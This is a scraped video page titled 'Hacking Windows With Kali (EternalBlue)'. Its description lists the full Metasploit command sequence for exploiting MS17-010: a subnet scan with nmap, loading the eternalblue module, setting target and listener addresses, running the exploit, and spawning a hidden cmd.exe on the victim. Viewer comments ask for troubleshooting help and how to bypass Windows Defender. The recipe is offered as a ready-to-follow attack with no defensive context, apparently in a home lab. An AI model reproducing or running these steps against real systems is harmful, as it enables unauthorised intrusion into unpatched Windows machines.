Hacking Windows With Kali (EternalBlue)

Поділитися
Вставка
  • Опубліковано 17 жов 2024
  • Commands:
    sudo nmap -O 192.168.0.0/24
    ny vindue
    msfconsole
    use exploit/windows/smb/ms17_010_eternalblue
    options
    set RHOST 192.168.0.11
    ifconfig
    set LHOST 192.168.0.12
    exploit or run
    vent
    execute
    execute -f cmd.exe -c -i -H
    cd c:\users\
    If you enjoyed this video, consider to SUBSCRIBE to my channel 😊
    It will be highly appreciated - Thanks!
  • Наука та технологія

КОМЕНТАРІ • 6

  • @princekouame6775
    @princekouame6775 2 роки тому

    please, need help when i run the exploit command its not working it shows me:
    ----fail---- instead of --win--
    at the penultimate line of the exploit command.

  • @TRASH_Z403
    @TRASH_Z403 4 місяці тому

    what is the network configuration in windows virualbox
    bridged???

  • @sumitmakadiya3119
    @sumitmakadiya3119 Рік тому +1

    If firewall is enabled you wil not get any results from nmap you get host is down

  • @matrix_250
    @matrix_250 Рік тому +1

    Bypass Windows Defender ?